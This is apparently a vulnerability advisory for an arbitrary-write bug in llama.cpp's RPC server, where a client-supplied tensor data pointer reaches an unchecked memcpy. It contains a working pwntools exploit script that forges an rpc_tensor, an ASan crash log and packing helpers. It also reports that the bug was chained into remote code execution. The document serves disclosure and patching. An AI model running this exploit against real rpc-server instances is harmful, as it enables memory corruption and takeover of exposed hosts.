Write-what-where in rpc_server::set_tensor

Write-what-where in ggml_backend_cpu_buffer_set_tensor

Summary

The data pointer member of the rpc_tensor structure is taken from the client without validation, so a remote client can make the RPC server write attacker-supplied bytes to an arbitrary address.

Details

First, note that the data pointer member of the rpc_tensor structure is fully controlled by the client.

// ggml_tensor is serialized into rpc_tensor
#pragma pack(push, 1)
struct rpc_tensor {
    uint64_t id;
    uint32_t type;
    uint64_t buffer;
    uint32_t ne[GGML_MAX_DIMS];
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char name[GGML_MAX_NAME];

    char padding[4];
};
#pragma pack(pop)
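
To make the layout concrete, here is a minimal Python sketch of the packed structure using the standard struct module. The constants GGML_MAX_DIMS = 4, GGML_MAX_OP_PARAMS = 64, GGML_MAX_SRC = 10 and GGML_MAX_NAME = 64 are assumptions inferred from the field counts used in the PoC in this advisory, not read from the ggml headers. The names RPC_TENSOR_FMT, DATA_OFFSET and pack_rpc_tensor are illustrative only.

```python
import struct

# Assumed constants (inferred from the PoC, not read from ggml headers)
GGML_MAX_DIMS = 4
GGML_MAX_OP_PARAMS = 64
GGML_MAX_SRC = 10
GGML_MAX_NAME = 64

# "<" means little-endian with no padding, mirroring #pragma pack(push, 1).
# Fields before `data`: id, type, buffer, ne[], nb[], op, op_params[], flags,
# src[], view_src, view_offs
_PREFIX_FMT = (
    "<QIQ"
    + f"{GGML_MAX_DIMS}I" * 2
    + "I"
    + f"{GGML_MAX_OP_PARAMS // 4}i"
    + "i"
    + f"{GGML_MAX_SRC}Q"
    + "QQ"
)
# Remaining fields: data, name, padding
RPC_TENSOR_FMT = _PREFIX_FMT + "Q" + f"{GGML_MAX_NAME}s" + "4s"

RPC_TENSOR_SIZE = struct.calcsize(RPC_TENSOR_FMT)
DATA_OFFSET = struct.calcsize(_PREFIX_FMT)  # byte offset of the `data` field


def pack_rpc_tensor(data_ptr, buffer=0):
    """Serialize an rpc_tensor whose `data` field is an arbitrary 64-bit value."""
    return struct.pack(
        RPC_TENSOR_FMT,
        1, 2, buffer,                        # id, type, buffer
        *([1] * GGML_MAX_DIMS),              # ne
        *([1] * GGML_MAX_DIMS),              # nb
        0,                                   # op
        *([0] * (GGML_MAX_OP_PARAMS // 4)),  # op_params
        0,                                   # flags
        *([0] * GGML_MAX_SRC),               # src
        0, 0,                                # view_src, view_offs
        data_ptr,                            # data: chosen freely by the client
        b"a" * GGML_MAX_NAME,                # name
        b"\x00" * 4,                         # padding
    )
```

Nothing in the serialized form ties data to the buffer it claims to belong to; it is simply eight client-chosen bytes inside the message.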

By controlling the value of data, a client can make the following call chain write to an arbitrary address:

start_rpc_server (llama.cpp/ggml/src/ggml-rpc.cpp, line 1144 in 75af08c)

    void start_rpc_server(ggml_backend_t backend, const char * endpoint, size_t free_mem, size_t total_mem) {

rpc_serve_client (llama.cpp/ggml/src/ggml-rpc.cpp, line 1060 in 75af08c)

    static void rpc_serve_client(ggml_backend_t backend, sockfd_t sockfd, size_t free_mem, size_t total_mem) {

rpc_server::set_tensor (llama.cpp/ggml/src/ggml-rpc.cpp, line 893 in e31a4f6)

    bool rpc_server::set_tensor(const std::vector<uint8_t> & input) {

ggml_backend_tensor_set (llama.cpp/ggml/src/ggml-backend.c, line 221 in 400ae6f)

    GGML_CALL void ggml_backend_tensor_set(struct ggml_tensor * tensor, const void * data, size_t offset, size_t size) {

ggml_backend_cpu_buffer_set_tensor (llama.cpp/ggml/src/ggml-backend.c, line 577 in 400ae6f)

    GGML_CALL static void ggml_backend_cpu_buffer_set_tensor(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, const void * data, size_t offset, size_t size) {

The last function in the chain performs the unchecked copy:

GGML_CALL static void ggml_backend_cpu_buffer_set_tensor(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, const void * data, size_t offset, size_t size) {
    memcpy((char *)tensor->data + offset, data, size);  // write-what-where: tensor->data comes from the client's rpc_tensor
    GGML_UNUSED(buffer);
}
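
The missing step is a range check before the copy. The sketch below models such a check in Python under stated assumptions: the function name write_is_in_bounds and its parameters are hypothetical, and it is not presented as the project's actual patch. It only illustrates the condition that [data + offset, data + offset + size) must lie inside the buffer the tensor claims to belong to, with 64-bit wraparound rejected.

```python
U64_MAX = 2**64 - 1


def write_is_in_bounds(buf_base, buf_size, data_ptr, offset, size):
    """Return True only if the write stays inside [buf_base, buf_base + buf_size)."""
    start = data_ptr + offset
    end = start + size
    # Python integers do not wrap, so anything above 2**64 - 1 would have
    # overflowed in C; treat that as out of bounds.
    if start > U64_MAX or end > U64_MAX:
        return False
    return buf_base <= start and end <= buf_base + buf_size
```

With the values from the server log in this advisory (buffer at 0x60b000000460 with remote_size 288, data 0xdeadbeef, offset 0, size 264), this check returns False, so the copy would be refused.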

PoC

Build

git clone https://github.com/ggerganov/llama.cpp.git && cd llama.cpp && mkdir build-rpc && cd build-rpc && cmake .. -DGGML_RPC=ON && cmake --build . --config Release
pip install pwntools

Reproduce

From llama.cpp/build-rpc/bin, start the server:

./rpc-server -p 50052

Then run the following Python script:

from pwn import *

ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10

context(arch='amd64',log_level = 'debug')

p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_DEVICE_MEMORY)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
p.close()


p = remote("127.0.0.1",50052)

pd = b''
cmd = p8(GET_ALIGNMENT)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content

cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
remote_ptr = u64(recv[0x18:0x20])
sz = u64(recv[0x20:0x28])
log.success(f"remote_ptr:{hex(remote_ptr)},size:{sz}")
p.recvall(timeout=1)
p.close()

# If the vulnerability does not trigger, set next_ptr to the buffer address
# returned by the ALLOC_BUFFER call in the final connection (the server logs
# it as remote_ptr).
next_ptr = remote_ptr + 0x160
log.success(f'next_ptr:{hex(next_ptr)}')


p = remote("127.0.0.1",50052)
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd = cmd + input_size + content
leak_address = remote_ptr + 0x90

# Forge an rpc_tensor whose data field holds the target address
rpc_tensor_pd = flat(
    {
        0: [
            0x1,  # id
            p32(2),  # type
            p64(next_ptr),  # buffer
            [  # ne
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
                p32(0xdeadbeef),
            ],
            [  # nb
                p32(1),
                p32(1),
                p32(1),
                p32(1),
            ],
            p32(0),  # op
            [p32(0)] * 16,  # op_params
            p32(0),  # flags
            [p64(0)] * 10,  # src
            p64(0),  # view_src
            p64(0),  # view_offs
            p64(0xdeadbeef),  # data: the address the server will write to
            b'a' * 64,  # name
            b'x' * 4  # padding
        ],
    }
)
cmd = p8(SET_TENSOR)
content = flat(
    {
        0: [rpc_tensor_pd + p64(0) + p64(0x100),
            b'a'*0x100]
    }
)
input_size = p64(len(content))
pd+= cmd + input_size + content

p.send(pd)
p.recv(0x18)
p.close()

The server then performs the write-what-where: it copies the attacker-supplied bytes to the attacker-chosen address 0xdeadbeef.
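
The message framing the script relies on can be sketched without pwntools. Each request in the PoC is a 1-byte command, an 8-byte little-endian payload length, and then the payload. The helper name frame is hypothetical, and the framing is inferred from how the PoC builds its requests rather than from the server source.

```python
import struct

# Command codes as listed in the PoC
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
SET_TENSOR = 6


def frame(cmd, payload=b""):
    """Build one request: | cmd (1 byte) | len(payload) (8 bytes, LE) | payload |."""
    return struct.pack("<BQ", cmd, len(payload)) + payload


# Equivalent to the PoC's p8(ALLOC_BUFFER) + p64(8) + p64(0x100)
alloc_request = frame(ALLOC_BUFFER, struct.pack("<Q", 0x100))
```

Several framed requests can be concatenated and sent in one write, which is what the PoC does when it appends SET_TENSOR to the ALLOC_BUFFER request.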

ASan log

➜  bin git:(master) ✗ ./rpc-server -p 50052
create_backend: using CPU backend
Starting RPC server on 0.0.0.0:50052, backend memory: 7896 MB
Accepted client connection, free_mem=8280244224, total_mem=8280244224
Client connection closed
[~socket_t] closing socket 4
Accepted client connection, free_mem=8280244224, total_mem=8280244224
[get_alignment] alignment: 32
[alloc_buffer] size: 256 -> remote_ptr: 60b000000300, remote_size: 288
Client connection closed
[~socket_t] closing socket 4
Accepted client connection, free_mem=8280244224, total_mem=8280244224
[alloc_buffer] size: 256 -> remote_ptr: 60b000000460, remote_size: 288
[set_tensor] buffer: 0x60b000000460, data: 0xdeadbeef, offset: 0, size: 264
=================================================================
==12636==ERROR: AddressSanitizer: unknown-crash on address 0x0000deadbeef at pc 0x7f320e63a2c3 bp 0x7ffc8dcfc8d0 sp 0x7ffc8dcfc078
WRITE of size 264 at 0x0000deadbeef thread T0
    #0 0x7f320e63a2c2 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
    #1 0x7f320e3464ea in rpc_server::set_tensor(std::vector<unsigned char, std::allocator<unsigned char> > const&) (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x1464ea)
    #2 0x7f320e35765a in start_rpc_server (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/ggml/src/libggml.so+0x15765a)
    #3 0x573e32234c63 in main (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2c63)
    #4 0x7f320da29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #5 0x7f320da29e3f in __libc_start_main_impl ../csu/libc-start.c:392
    #6 0x573e32234ff4 in _start (/home/heckar/AI-Sec/llama/llama.cpp/build-rpc-asan-debug/bin/rpc-server+0x2ff4)

Address 0x0000deadbeef is located in the shadow gap area.
SUMMARY: AddressSanitizer: unknown-crash ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
==12636==ABORTING
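
The size: 264 in the [set_tensor] log line follows from how the PoC's SET_TENSOR payload splits. The sketch below assumes the layout | rpc_tensor | offset (8 bytes) | data | and a 296-byte packed rpc_tensor (with GGML_MAX_DIMS = 4, 16 op_params, GGML_MAX_SRC = 10, GGML_MAX_NAME = 64). Both are assumptions consistent with the PoC and the log, not taken from the server source. The helper names are hypothetical.

```python
import struct

# Packed rpc_tensor layout under the assumed constants (little-endian, no padding)
RPC_TENSOR_FMT = "<QIQ4I4II16ii10QQQQ64s4s"
RPC_TENSOR_SIZE = struct.calcsize(RPC_TENSOR_FMT)
DATA_FIELD_INDEX = 41  # position of `data` in the unpacked tuple


def split_set_tensor(payload):
    """Split a SET_TENSOR payload into (data pointer, offset, bytes to write)."""
    if len(payload) < RPC_TENSOR_SIZE + 8:
        raise ValueError("payload too short")
    fields = struct.unpack_from(RPC_TENSOR_FMT, payload, 0)
    (offset,) = struct.unpack_from("<Q", payload, RPC_TENSOR_SIZE)
    data = payload[RPC_TENSOR_SIZE + 8:]
    return fields[DATA_FIELD_INDEX], offset, data


def example_payload():
    """Rebuild the PoC's payload: tensor + p64(0) + p64(0x100) + 0x100 bytes."""
    tensor = struct.pack(
        RPC_TENSOR_FMT,
        1, 2, 0,                # id, type, buffer (buffer value irrelevant here)
        *([0xdeadbeef] * 4),    # ne
        *([1] * 4),             # nb
        0,                      # op
        *([0] * 16),            # op_params
        0,                      # flags
        *([0] * 10),            # src
        0, 0,                   # view_src, view_offs
        0xdeadbeef,             # data
        b"a" * 64,              # name
        b"x" * 4,               # padding
    )
    return tensor + struct.pack("<QQ", 0, 0x100) + b"a" * 0x100


data_ptr, offset, data = split_set_tensor(example_payload())
```

Under these assumptions the first 8 bytes after the tensor are the offset (0), and everything after that is data to copy: the 8 bytes of p64(0x100) plus the 0x100 filler bytes, 264 bytes in total, written to 0xdeadbeef.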

Impact

This vulnerability gives an attacker an arbitrary-write primitive. Combined with a separate arbitrary-address read vulnerability, I used it to achieve remote code execution (RCE), which demonstrates its significant impact. A video of the RCE is available at: https://drive.google.com/file/d/1vuoxQblMJ7KcaH05Z_sk_ruHSN0ftKvz/view?usp=sharing

Credit

This vulnerability was discovered by 7resp4ss and Guang Gong from 360 Vulnerability Research Institute.
